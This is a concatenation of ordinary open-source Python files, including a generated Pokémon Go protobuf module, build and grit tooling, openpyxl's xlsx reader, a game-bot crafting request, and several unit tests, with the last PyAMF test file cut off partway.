options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SET_AVATAR', index=57, number=404,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SET_PLAYER_TEAM', index=58, number=405,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MARK_TUTORIAL_COMPLETE', index=59, number=406,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LOAD_SPAWN_POINTS', index=60, number=500,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ECHO', index=61, number=666,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DEBUG_UPDATE_INVENTORY', index=62, number=700,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DEBUG_DELETE_PLAYER', index=63, number=701,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SFIDA_REGISTRATION', index=64, number=800,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SFIDA_ACTION_LOG', index=65, number=801,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SFIDA_CERTIFICATION', index=66, number=802,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SFIDA_UPDATE', index=67, number=803,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SFIDA_ACTION', index=68, number=804,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SFIDA_DOWSER', index=69, number=805,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SFIDA_CAPTURE', index=70, number=806,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=176,
serialized_end=1777,
)
_sym_db.RegisterEnumDescriptor(_REQUESTTYPE)
RequestType = enum_type_wrapper.EnumTypeWrapper(_REQUESTTYPE)
METHOD_UNSET = 0
PLAYER_UPDATE = 1
GET_PLAYER = 2
GET_INVENTORY = 4
DOWNLOAD_SETTINGS = 5
DOWNLOAD_ITEM_TEMPLATES = 6
DOWNLOAD_REMOTE_CONFIG_VERSION = 7
FORT_SEARCH = 101
ENCOUNTER = 102
CATCH_POKEMON = 103
FORT_DETAILS = 104
ITEM_USE = 105
GET_MAP_OBJECTS = 106
FORT_DEPLOY_POKEMON = 110
FORT_RECALL_POKEMON = 111
RELEASE_POKEMON = 112
USE_ITEM_POTION = 113
USE_ITEM_CAPTURE = 114
USE_ITEM_FLEE = 115
USE_ITEM_REVIVE = 116
TRADE_SEARCH = 117
TRADE_OFFER = 118
TRADE_RESPONSE = 119
TRADE_RESULT = 120
GET_PLAYER_PROFILE = 121
GET_ITEM_PACK = 122
BUY_ITEM_PACK = 123
BUY_GEM_PACK = 124
EVOLVE_POKEMON = 125
GET_HATCHED_EGGS = 126
ENCOUNTER_TUTORIAL_COMPLETE = 127
LEVEL_UP_REWARDS = 128
CHECK_AWARDED_BADGES = 129
USE_ITEM_GYM = 133
GET_GYM_DETAILS = 134
START_GYM_BATTLE = 135
ATTACK_GYM = 136
RECYCLE_INVENTORY_ITEM = 137
COLLECT_DAILY_BONUS = 138
USE_ITEM_XP_BOOST = 139
USE_ITEM_EGG_INCUBATOR = 140
USE_INCENSE = 141
GET_INCENSE_POKEMON = 142
INCENSE_ENCOUNTER = 143
ADD_FORT_MODIFIER = 144
DISK_ENCOUNTER = 145
COLLECT_DAILY_DEFENDER_BONUS = 146
UPGRADE_POKEMON = 147
SET_FAVORITE_POKEMON = 148
NICKNAME_POKEMON = 149
EQUIP_BADGE = 150
SET_CONTACT_SETTINGS = 151
GET_ASSET_DIGEST = 300
GET_DOWNLOAD_URLS = 301
GET_SUGGESTED_CODENAMES = 401
CHECK_CODENAME_AVAILABLE = 402
CLAIM_CODENAME = 403
SET_AVATAR = 404
SET_PLAYER_TEAM = 405
MARK_TUTORIAL_COMPLETE = 406
LOAD_SPAWN_POINTS = 500
ECHO = 666
DEBUG_UPDATE_INVENTORY = 700
DEBUG_DELETE_PLAYER = 701
SFIDA_REGISTRATION = 800
SFIDA_ACTION_LOG = 801
SFIDA_CERTIFICATION = 802
SFIDA_UPDATE = 803
SFIDA_ACTION = 804
SFIDA_DOWSER = 805
SFIDA_CAPTURE = 806
_REQUEST = _descriptor.Descriptor(
name='Request',
full_name='POGOProtos.Networking.Requests.Request',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='request_type', full_name='POGOProtos.Networking.Requests.Request.request_type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='request_message', full_name='POGOProtos.Networking.Requests.Request.request_message', index=1,
number=2, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=72,
serialized_end=173,
)
_REQUEST.fields_by_name['request_type'].enum_type = _REQUESTTYPE
DESCRIPTOR.message_types_by_name['Request'] = _REQUEST
DESCRIPTOR.enum_types_by_name['RequestType'] = _REQUESTTYPE
Request = _reflection.GeneratedProtocolMessageType('Request', (_message.Message,), dict(
DESCRIPTOR = _REQUEST,
__module__ = 'POGOProtos.Networking.Requests_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Networking.Requests.Request)
))
_sym_db.RegisterMessage(Request)
# @@protoc_insertion_point(module_scope)
|
pczerkas/devstack
|
refs/heads/master
|
setup.py
|
463
|
#!/usr/bin/env python
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# THIS FILE IS MANAGED BY THE GLOBAL REQUIREMENTS REPO - DO NOT EDIT
import setuptools
setuptools.setup(
setup_requires=['pbr'],
pbr=True)
|
refola/piklisp.py
|
refs/heads/master
|
piklisp.py
|
2
|
#!/usr/bin/python3
'''
piklisp.py
Author: Mark Haferkamp
Last date modified: 2015-04-08
Interpret a Pythony dialect of Lisp.
Piklisp is a scripting language that uses a parentheses-light Lisp syntax and macro system to run Python functions.
It's essentially Pythonic syntax and features combined with Lisp semantics and listiness. As Clojure is to Java, Piklisp tries to be to Python.
'''
import sys
import tokens
import parser
import compiler
def getLines(filename):
'''Get the lines of text in a file, without line breaks.'''
f = open(filename, 'rt')
lines = list(l in f)
return lines
def process(filename):
    '''Process a single file. Takes the name of a .pyl file and saves the result to a .py file.'''
    lineList = getLines(filename)
    tokenList = tokens.convert(lineList)
    parseTree = parser.parseTokens(tokenList)
    compiled = compiler.compileTree(parseTree)
    # The original called writeFile(compiled) with no target path and no
    # writeFile anywhere in the module; write next to the source with a .py
    # extension instead (see the helper sketch below).
    writeFile(filename[:-4] + '.py', compiled)
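def writeFile(filename, text):
    '''Minimal sketch of the missing helper; assumes the compiler returns the
    program text as a single string.'''
    with open(filename, 'wt') as f:
        f.write(text)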
def usage():
'''Show how to use the program.'''
print("Usage: %s pyl-file-1 [pyl-file-2 [...]]" % sys.argv[0])
print()
print("Converts given .pyl Piklisp files into .py Python files.")
print("You probably want to run this as '%s *.pyl'." % sys.argv[0])
def main():
'''Figure out what to do.'''
args=sys.argv[1:]
if len(args) == 0:
usage()
return
for arg in args:
if arg[-4:] != '.pyl':
print("Invalid Piklisp file: %s." % arg)
usage()
return
for arg in args:
process(arg)
main()
|
erickt/hue
|
refs/heads/master
|
desktop/core/ext-py/tablib-develop/tablib/packages/openpyxl/reader/excel.py
|
61
|
# file openpyxl/reader/excel.py
# Copyright (c) 2010 openpyxl
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# @license: http://www.opensource.org/licenses/mit-license.php
# @author: Eric Gazoni
"""Read an xlsx file into Python"""
# Python stdlib imports
from zipfile import ZipFile, ZIP_DEFLATED, BadZipfile
# package imports
from ..shared.exc import OpenModeError, InvalidFileException
from ..shared.ooxml import ARC_SHARED_STRINGS, ARC_CORE, ARC_APP, \
ARC_WORKBOOK, PACKAGE_WORKSHEETS, ARC_STYLE
from ..workbook import Workbook
from ..reader.strings import read_string_table
from ..reader.style import read_style_table
from ..reader.workbook import read_sheets_titles, read_named_ranges, \
read_properties_core, get_sheet_ids
from ..reader.worksheet import read_worksheet
from ..reader.iter_worksheet import unpack_worksheet
def load_workbook(filename, use_iterators = False):
"""Open the given filename and return the workbook
:param filename: the path to open
:type filename: string
:param use_iterators: use lazy load for cells
:type use_iterators: bool
:rtype: :class:`openpyxl.workbook.Workbook`
.. note::
When using lazy load, all worksheets will be :class:`openpyxl.reader.iter_worksheet.IterableWorksheet`
and the returned workbook will be read-only.
"""
if isinstance(filename, file):
# fileobject must have been opened with 'rb' flag
# it is required by zipfile
if 'b' not in filename.mode:
raise OpenModeError("File-object must be opened in binary mode")
try:
archive = ZipFile(filename, 'r', ZIP_DEFLATED)
except (BadZipfile, RuntimeError, IOError, ValueError):
raise InvalidFileException()
wb = Workbook()
if use_iterators:
wb._set_optimized_read()
try:
_load_workbook(wb, archive, filename, use_iterators)
except KeyError:
raise InvalidFileException()
finally:
archive.close()
return wb
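# Illustrative usage (a sketch; 'report.xlsx' is a hypothetical path):
#
#   wb = load_workbook('report.xlsx')
#   for ws in wb.worksheets:
#       print ws.title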
def _load_workbook(wb, archive, filename, use_iterators):
# get workbook-level information
wb.properties = read_properties_core(archive.read(ARC_CORE))
try:
string_table = read_string_table(archive.read(ARC_SHARED_STRINGS))
except KeyError:
string_table = {}
style_table = read_style_table(archive.read(ARC_STYLE))
# get worksheets
wb.worksheets = [] # remove preset worksheet
sheet_names = read_sheets_titles(archive.read(ARC_APP))
for i, sheet_name in enumerate(sheet_names):
sheet_codename = 'sheet%d.xml' % (i + 1)
worksheet_path = '%s/%s' % (PACKAGE_WORKSHEETS, sheet_codename)
if not use_iterators:
new_ws = read_worksheet(archive.read(worksheet_path), wb, sheet_name, string_table, style_table)
else:
xml_source = unpack_worksheet(archive, worksheet_path)
new_ws = read_worksheet(xml_source, wb, sheet_name, string_table, style_table, filename, sheet_codename)
#new_ws = read_worksheet(archive.read(worksheet_path), wb, sheet_name, string_table, style_table, filename, sheet_codename)
wb.add_sheet(new_ws, index = i)
wb._named_ranges = read_named_ranges(archive.read(ARC_WORKBOOK), wb)
|
KevZho/buffbot
|
refs/heads/master
|
kol/request/CocktailcraftingRequest.py
|
4
|
import kol.Error as Error
from kol.database import ItemDatabase
from kol.manager import PatternManager
from kol.request.GenericRequest import GenericRequest
class CocktailcraftingRequest(GenericRequest):
def __init__(self, session, itemid1, itemid2, numDrinks=1, makeMax=False):
super(CocktailcraftingRequest, self).__init__(session)
self.url = session.serverURL + "craft.php"
self.requestData['mode'] = 'cocktail'
self.requestData['pwd'] = session.pwd
self.requestData['action'] = 'craft'
self.requestData['qty'] = numDrinks
self.requestData['a'] = itemid1
self.requestData['b'] = itemid2
if makeMax:
self.requestData['max'] = "on"
def parseResponse(self):
itemsDontMakeCocktailPattern = PatternManager.getOrCompilePattern('itemsDontMakeCocktail')
dontHaveSkillPattern = PatternManager.getOrCompilePattern('dontHaveSkillToMixCocktail')
dontHaveItemsPattern = PatternManager.getOrCompilePattern('dontHaveItemsForThatCocktail')
dontHaveAdventuresPattern = PatternManager.getOrCompilePattern('dontHaveAdventuresToMixCocktail')
# Check for errors.
if itemsDontMakeCocktailPattern.search(self.responseText):
raise Error.Error("Unable to make cocktail. The submitted ingredients do not mix together.", Error.RECIPE_NOT_FOUND)
elif dontHaveSkillPattern.search(self.responseText):
raise Error.Error("Unable to make cocktail. We are not skilled enough.", Error.SKILL_NOT_FOUND)
elif dontHaveItemsPattern.search(self.responseText):
raise Error.Error("Unable to make cocktail. You don't have all of the items you are trying to mix.", Error.ITEM_NOT_FOUND)
elif dontHaveAdventuresPattern.search(self.responseText):
raise Error.Error("Unable to mix drink(s). We don't have enough adventures.", Error.NOT_ENOUGH_ADVENTURES)
# Find the items attached to the message.
singleItemPattern = PatternManager.getOrCompilePattern('acquireSingleItem')
match = singleItemPattern.search(self.responseText)
if match:
descId = int(match.group(1))
item = ItemDatabase.getOrDiscoverItemFromDescId(descId, self.session)
item["quantity"] = 1
else:
multiItemPattern = PatternManager.getOrCompilePattern('acquireMultipleItems')
match = multiItemPattern.search(self.responseText)
if match:
descId = int(match.group(1))
item = ItemDatabase.getOrDiscoverItemFromDescId(descId, self.session)
quantity = int(match.group(2).replace(',', ''))
item["quantity"] = quantity
else:
raise Error.Error("Unknown error.", Error.REQUEST_GENERIC)
self.responseData["booze"] = item
|
lucafavatella/intellij-community
|
refs/heads/cli-wip
|
python/testData/refactoring/introduceVariable/suggestStringConstantValue.py
|
166
|
"foo <caret>bar"
|
heke123/chromium-crosswalk
|
refs/heads/master
|
tools/grit/grit_info.py
|
31
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Tool to determine inputs and outputs of a grit file.
'''
import optparse
import os
import posixpath
import sys
from grit import grd_reader
from grit import util
class WrongNumberOfArguments(Exception):
pass
def Outputs(filename, defines, ids_file, target_platform=None):
grd = grd_reader.Parse(
filename, defines=defines, tags_to_ignore=set(['messages']),
first_ids_file=ids_file, target_platform=target_platform)
target = []
lang_folders = {}
# Add all explicitly-specified output files
for output in grd.GetOutputFiles():
path = output.GetFilename()
target.append(path)
if path.endswith('.h'):
path, filename = os.path.split(path)
if output.attrs['lang']:
lang_folders[output.attrs['lang']] = os.path.dirname(path)
# Add all generated files, once for each output language.
for node in grd:
if node.name == 'structure':
with node:
# TODO(joi) Should remove the "if sconsdep is true" thing as it is a
# hack - see grit/node/structure.py
if node.HasFileForLanguage() and node.attrs['sconsdep'] == 'true':
for lang in lang_folders:
path = node.FileForLanguage(lang, lang_folders[lang],
create_file=False,
return_if_not_generated=False)
if path:
target.append(path)
return [t.replace('\\', '/') for t in target]
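# Lists grit's own .py sources (excluding unittests) so that builds can also
# depend on the tool itself.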
def GritSourceFiles():
files = []
grit_root_dir = os.path.relpath(os.path.dirname(__file__), os.getcwd())
for root, dirs, filenames in os.walk(grit_root_dir):
grit_src = [os.path.join(root, f) for f in filenames
if f.endswith('.py') and not f.endswith('_unittest.py')]
files.extend(grit_src)
return sorted(files)
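# Computes the set of input files the given grd file depends on, including
# flattened/inlined resources.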
def Inputs(filename, defines, ids_file, target_platform=None):
grd = grd_reader.Parse(
filename, debug=False, defines=defines, tags_to_ignore=set(['message']),
first_ids_file=ids_file, target_platform=target_platform)
files = set()
for lang, ctx, fallback in grd.GetConfigurations():
# TODO(tdanderson): Refactor all places which perform the action of setting
# output attributes on the root. See crbug.com/503637.
grd.SetOutputLanguage(lang or grd.GetSourceLanguage())
grd.SetOutputContext(ctx)
grd.SetFallbackToDefaultLayout(fallback)
for node in grd.ActiveDescendants():
with node:
if (node.name == 'structure' or node.name == 'skeleton' or
(node.name == 'file' and node.parent and
node.parent.name == 'translations')):
path = node.GetInputPath()
if path is not None:
files.add(grd.ToRealPath(path))
# If it's a flattened node, grab inlined resources too.
if node.name == 'structure' and node.attrs['flattenhtml'] == 'true':
node.RunPreSubstitutionGatherer()
files.update(node.GetHtmlResourceFilenames())
elif node.name == 'grit':
first_ids_file = node.GetFirstIdsFile()
if first_ids_file:
files.add(first_ids_file)
elif node.name == 'include':
files.add(grd.ToRealPath(node.GetInputPath()))
# If it's a flattened node, grab inlined resources too.
if node.attrs['flattenhtml'] == 'true':
files.update(node.GetHtmlResourceFilenames())
elif node.name == 'part':
files.add(util.normpath(os.path.join(os.path.dirname(filename),
node.GetInputPath())))
cwd = os.getcwd()
return [os.path.relpath(f, cwd) for f in sorted(files)]
def PrintUsage():
print 'USAGE: ./grit_info.py --inputs [-D foo] [-f resource_ids] <grd-file>'
print (' ./grit_info.py --outputs [-D foo] [-f resource_ids] ' +
'<out-prefix> <grd-file>')
def DoMain(argv):
parser = optparse.OptionParser()
parser.add_option("--inputs", action="store_true", dest="inputs")
parser.add_option("--outputs", action="store_true", dest="outputs")
parser.add_option("-D", action="append", dest="defines", default=[])
# grit build also supports '-E KEY=VALUE', support that to share command
# line flags.
parser.add_option("-E", action="append", dest="build_env", default=[])
parser.add_option("-w", action="append", dest="whitelist_files", default=[])
parser.add_option("--output-all-resource-defines", action="store_true",
dest="output_all_resource_defines", default=True,
help="Unused")
parser.add_option("--no-output-all-resource-defines", action="store_false",
dest="output_all_resource_defines", default=True,
help="Unused")
parser.add_option("-f", dest="ids_file",
default="GRIT_DIR/../gritsettings/resource_ids")
parser.add_option("-t", dest="target_platform", default=None)
options, args = parser.parse_args(argv)
defines = {}
for define in options.defines:
name, val = util.ParseDefine(define)
defines[name] = val
for env_pair in options.build_env:
(env_name, env_value) = env_pair.split('=', 1)
os.environ[env_name] = env_value
if options.inputs:
if len(args) > 1:
raise WrongNumberOfArguments("Expected 0 or 1 arguments for --inputs.")
inputs = []
if len(args) == 1:
filename = args[0]
inputs = Inputs(filename, defines, options.ids_file,
options.target_platform)
# Add in the grit source files. If one of these change, we want to re-run
# grit.
inputs.extend(GritSourceFiles())
inputs = [f.replace('\\', '/') for f in inputs]
if len(args) == 1:
# Include grd file as second input (works around gyp expecting it).
inputs.insert(1, args[0])
if options.whitelist_files:
inputs.extend(options.whitelist_files)
return '\n'.join(inputs)
elif options.outputs:
if len(args) != 2:
raise WrongNumberOfArguments(
"Expected exactly 2 arguments for --outputs.")
prefix, filename = args
outputs = [posixpath.join(prefix, f)
for f in Outputs(filename, defines,
options.ids_file, options.target_platform)]
return '\n'.join(outputs)
else:
raise WrongNumberOfArguments("Expected --inputs or --outputs.")
def main(argv):
if sys.version_info < (2, 6):
print "GRIT requires Python 2.6 or later."
return 1
try:
result = DoMain(argv[1:])
except WrongNumberOfArguments, e:
PrintUsage()
print e
return 1
print result
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
endlessm/chromium-browser
|
refs/heads/master
|
third_party/llvm/lldb/test/API/functionalities/recursion/TestValueObjectRecursion.py
|
6
|
"""
Test lldb data formatter subsystem.
"""
from __future__ import print_function
import lldb
from lldbsuite.test.lldbtest import *
import lldbsuite.test.lldbutil as lldbutil
class ValueObjectRecursionTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line number to break at.
self.line = line_number('main.cpp', '// Set break point at this line.')
def test_with_run_command(self):
"""Test that deeply nested ValueObjects still work."""
self.build()
self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
lldbutil.run_break_set_by_file_and_line(
self, "main.cpp", self.line, num_expected_locations=1, loc_exact=True)
self.runCmd("run", RUN_SUCCEEDED)
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs=['stopped',
'stop reason = breakpoint'])
# This is the function to remove the custom formats in order to have a
# clean slate for the next test case.
def cleanup():
self.runCmd('type format clear', check=False)
self.runCmd('type summary clear', check=False)
# Execute the cleanup function during test case tear down.
self.addTearDownHook(cleanup)
root = self.frame().FindVariable("root")
child = root.GetChildAtIndex(1)
if self.TraceOn():
print(root)
print(child)
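        # Descend 15000 links into the list to stress deeply nested ValueObjects.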
for i in range(0, 15000):
child = child.GetChildAtIndex(1)
if self.TraceOn():
print(child)
self.assertTrue(
child.IsValid(),
"could not retrieve the deep ValueObject")
self.assertTrue(
child.GetChildAtIndex(0).IsValid(),
"the deep ValueObject has no value")
self.assertTrue(
child.GetChildAtIndex(0).GetValueAsUnsigned() != 0,
"the deep ValueObject has a zero value")
self.assertTrue(
child.GetChildAtIndex(1).GetValueAsUnsigned() != 0,
"the deep ValueObject has no next")
|
junhuac/MQUIC
|
refs/heads/master
|
src/tools/grit/grit/node/include_unittest.py
|
52
|
#!/usr/bin/env python
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Unit tests for include.IncludeNode'''
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import os
import StringIO
import unittest
from grit.node import misc
from grit.node import include
from grit.node import empty
from grit import grd_reader
from grit import util
class IncludeNodeUnittest(unittest.TestCase):
def testGetPath(self):
root = misc.GritNode()
root.StartParsing(u'grit', None)
root.HandleAttribute(u'latest_public_release', u'0')
root.HandleAttribute(u'current_release', u'1')
root.HandleAttribute(u'base_dir', ur'..\resource')
release = misc.ReleaseNode()
release.StartParsing(u'release', root)
release.HandleAttribute(u'seq', u'1')
root.AddChild(release)
includes = empty.IncludesNode()
includes.StartParsing(u'includes', release)
release.AddChild(includes)
include_node = include.IncludeNode()
include_node.StartParsing(u'include', includes)
include_node.HandleAttribute(u'file', ur'flugel\kugel.pdf')
includes.AddChild(include_node)
root.EndParsing()
self.assertEqual(root.ToRealPath(include_node.GetInputPath()),
util.normpath(
os.path.join(ur'../resource', ur'flugel/kugel.pdf')))
def testGetPathNoBasedir(self):
root = misc.GritNode()
root.StartParsing(u'grit', None)
root.HandleAttribute(u'latest_public_release', u'0')
root.HandleAttribute(u'current_release', u'1')
root.HandleAttribute(u'base_dir', ur'..\resource')
release = misc.ReleaseNode()
release.StartParsing(u'release', root)
release.HandleAttribute(u'seq', u'1')
root.AddChild(release)
includes = empty.IncludesNode()
includes.StartParsing(u'includes', release)
release.AddChild(includes)
include_node = include.IncludeNode()
include_node.StartParsing(u'include', includes)
include_node.HandleAttribute(u'file', ur'flugel\kugel.pdf')
include_node.HandleAttribute(u'use_base_dir', u'false')
includes.AddChild(include_node)
root.EndParsing()
self.assertEqual(root.ToRealPath(include_node.GetInputPath()),
util.normpath(
os.path.join(ur'../', ur'flugel/kugel.pdf')))
if __name__ == '__main__':
unittest.main()
|
d3m3vilurr/node-gyp
|
refs/heads/master
|
legacy/tools/gyp/pylib/gyp/generator/ninja_test.py
|
39
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Unit tests for the ninja.py file. """
import gyp.generator.ninja as ninja
import unittest
import StringIO
import TestCommon
class TestPrefixesAndSuffixes(unittest.TestCase):
def test_BinaryNamesWindows(self):
writer = ninja.NinjaWriter('wee', '.', '.', 'ninja.build', 'win')
spec = { 'target_name': 'wee' }
self.assertTrue(writer.ComputeOutputFileName(spec, 'executable').
endswith('.exe'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'shared_library').
endswith('.dll'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'static_library').
endswith('.lib'))
def test_BinaryNamesLinux(self):
writer = ninja.NinjaWriter('wee', '.', '.', 'ninja.build', 'linux')
spec = {
'target_name': 'wee'
}
self.assertTrue('.' not in writer.ComputeOutputFileName(spec, 'executable'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'shared_library').
startswith('lib'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'static_library').
startswith('lib'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'shared_library').
endswith('.so'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'static_library').
endswith('.a'))
if __name__ == '__main__':
unittest.main()
|
GdZ/scriptfile
|
refs/heads/master
|
software/googleAppEngine/lib/PyAMF/pyamf/tests/adapters/test_google.py
|
26
|
# Copyright (c) The PyAMF Project.
# See LICENSE.txt for details.
"""
PyAMF Google adapter tests.
@since: 0.3.1
"""
import unittest
import datetime
import struct
import os
import pyamf
from pyamf import amf3
from pyamf.tests import util
try:
from google.appengine.ext import db
except ImportError:
db = None
blobstore = None
polymodel = None
adapter_db = None
adapter_blobstore = None
test_models = None
Spam = util.Spam
def setUpModule():
"""
"""
global db, blobstore, polymodel, adapter_blobstore, adapter_db, test_models
if db is None:
raise unittest.SkipTest("'google.appengine.ext.db' is not available")
if not os.environ.get('SERVER_SOFTWARE', None):
# this is an extra check because the AppEngine SDK may be in PYTHONPATH
raise unittest.SkipTest('Appengine env not bootstrapped correctly')
# all looks good - we now initialise the imports we require
from google.appengine.ext import blobstore
from google.appengine.ext.db import polymodel
from pyamf.adapters import _google_appengine_ext_db as adapter_db
from pyamf.adapters import _google_appengine_ext_blobstore as adapter_blobstore
from pyamf.tests.adapters import _google_models as test_models
class BaseTestCase(util.ClassCacheClearingTestCase):
"""
"""
def put(self, entity):
entity.put()
self.addCleanup(self.deleteEntity, entity)
def deleteEntity(self, entity):
if entity.is_saved():
entity.delete()
def decode(self, bytes, encoding=pyamf.AMF3):
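        # pyamf.decode yields each AMF message in the stream; unwrap the
        # common single-message case for convenience.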
decoded = list(pyamf.decode(bytes, encoding=encoding))
if len(decoded) == 1:
return decoded[0]
return decoded
def encodeKey(self, key, encoding):
"""
Returns an AMF encoded representation of a L{db.Key} instance.
@param key: The L{db.Key} to be encoded.
@type key: L{db.Key}
@param encoding: The AMF version.
"""
if hasattr(key, 'key'):
# we have a db.Model instance
try:
key = key.key()
except db.NotSavedError:
key = None
if not key:
# the AMF representation of None
if encoding == pyamf.AMF3:
return '\x01'
return '\x05'
k = str(key)
if encoding == pyamf.AMF3:
return '\x06%s%s' % (
amf3.encode_int(len(k) << 1 | amf3.REFERENCE_BIT), k)
return '\x02%s%s' % (struct.pack('>H', len(k)), k)
class JessicaFactory(object):
"""
Provides jessica!
"""
jessica_attrs = {
'name': 'Jessica',
'type': 'cat',
'birthdate': datetime.date(1986, 10, 2),
'weight_in_pounds': 5,
'spayed_or_neutered': False
}
@classmethod
def makeJessica(kls, cls, **kwargs):
j_kwargs = kls.jessica_attrs.copy()
j_kwargs.update(kwargs)
return cls(**j_kwargs)
class EncodingModelTestCase(BaseTestCase):
"""
"""
def setUp(self):
BaseTestCase.setUp(self)
self.jessica = JessicaFactory.makeJessica(test_models.PetModel)
def test_amf0(self):
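        # Inner tuples group byte chunks that may appear in any order.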
encoded = (
'\x03', (
'\x00\x04_key%s' % (self.encodeKey(self.jessica, pyamf.AMF0)),
'\x00\tbirthdate\x0bB^\xc4\xae\xaa\x00\x00\x00\x00\x00',
'\x00\x04name\x02\x00\x07Jessica',
'\x00\x12spayed_or_neutered\x01\x00',
'\x00\x04type\x02\x00\x03cat',
'\x00\x10weight_in_pounds\x00@\x14\x00\x00\x00\x00\x00\x00'
),
'\x00\x00\t'
)
self.assertEncodes(self.jessica, encoded, encoding=pyamf.AMF0)
def test_amf3(self):
bytes = (
'\n\x0b\x01', (
'\tname\x06\x0fJessica',
'\t_key%s' % (self.encodeKey(self.jessica, pyamf.AMF3)),
'\x13birthdate\x08\x01B^\xc4\xae\xaa\x00\x00\x00',
'!weight_in_pounds\x04\x05',
'\ttype\x06\x07cat',
'%spayed_or_neutered\x02\x01'
))
self.assertEncodes(self.jessica, bytes, encoding=pyamf.AMF3)
def test_save_amf0(self):
self.put(self.jessica)
bytes = ('\x03', (
'\x00\x04_key%s' % self.encodeKey(self.jessica, pyamf.AMF0),
'\x00\tbirthdate\x0bB^\xc4\xae\xaa\x00\x00\x00\x00\x00',
'\x00\x04name\x02\x00\x07Jessica',
'\x00\x12spayed_or_neutered\x01\x00',
'\x00\x04type\x02\x00\x03cat',
'\x00\x10weight_in_pounds\x00@\x14\x00\x00\x00\x00\x00\x00'),
'\x00\x00\t')
self.assertEncodes(self.jessica, bytes, encoding=pyamf.AMF0)
def test_save_amf3(self):
self.put(self.jessica)
bytes = (
'\n\x0b\x01', (
'\tname\x06\x0fJessica',
'\t_key%s' % self.encodeKey(self.jessica, pyamf.AMF3),
'\x13birthdate\x08\x01B^\xc4\xae\xaa\x00\x00\x00',
'!weight_in_pounds\x04\x05',
'\ttype\x06\x07cat',
'%spayed_or_neutered\x02\x01'
))
self.assertEncodes(self.jessica, bytes, encoding=pyamf.AMF3)
def test_alias_amf0(self):
pyamf.register_class(test_models.PetModel, 'Pet')
bytes = (
'\x10\x00\x03Pet', (
'\x00\x04_key%s' % self.encodeKey(self.jessica, pyamf.AMF0),
'\x00\tbirthdate\x0bB^\xc4\xae\xaa\x00\x00\x00\x00\x00',
'\x00\x04name\x02\x00\x07Jessica',
'\x00\x12spayed_or_neutered\x01\x00',
'\x00\x04type\x02\x00\x03cat',
'\x00\x10weight_in_pounds\x00@\x14\x00\x00\x00\x00\x00\x00'
),
'\x00\x00\t'
)
self.assertEncodes(self.jessica, bytes, encoding=pyamf.AMF0)
def test_alias_amf3(self):
pyamf.register_class(test_models.PetModel, 'Pet')
bytes = (
'\n\x0b\x07Pet', (
